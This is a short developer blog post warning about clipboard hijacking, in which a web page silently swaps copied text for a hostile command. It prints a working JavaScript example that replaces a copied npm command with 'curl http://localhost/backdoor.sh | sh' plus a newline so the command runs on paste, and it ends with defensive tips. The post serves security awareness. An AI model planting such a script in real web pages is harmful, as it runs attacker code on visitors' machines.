The Dangers of Copy & Paste (Copas)
I'm sure fellow developers have at some point copied a line of command from a website. We assume that the text we're copying is legitimate. Yes, or is it? What if the text we copy is replaced with a command that can harm us or contain malicious code?
All a hacker needs is a single line of command that can insert a backdoor or virus, allowing them to remotely control your device. This attack is simple yet effective. Here's a further explanation and how it works.
Watch the Video - Simulating the risk of copying and executing code directly in a terminal. For instance, when installing a package using npm and you find a command on a web page, without much thought, most of us simply copy and paste that text into the terminal. Codepen Copy&Paste.
PROBLEM: Another issue here is that the hacker presses enter with the code (\n) after a harmful command, causing the copied command to run automatically.
Example Script Used:
<p id="copy">npm install package</p>
<script>
document.getElementById('copy').addEventListener('copy', function(e) { e.clipboardData.setData('text/plain', 'curl http://localhost/backdoor.sh | sh\n'); e.preventDefault(); });
</script>
How to Avoid It?
- Ensure that the websites you visit are trustworthy and secure. For instance, when looking for documentation or a package, go directly to the official site.
- As a precaution, don't paste copied text directly into the terminal. Try pasting it into a notepad or another text editor first.
- In essence, avoid pasting text directly into the terminal.
# Author's Message
Always be cautious and vigilant, because we never know what kind of mischief we might face in the future.
That's all I have to offer. I hope it's helpful. Thank you! 😁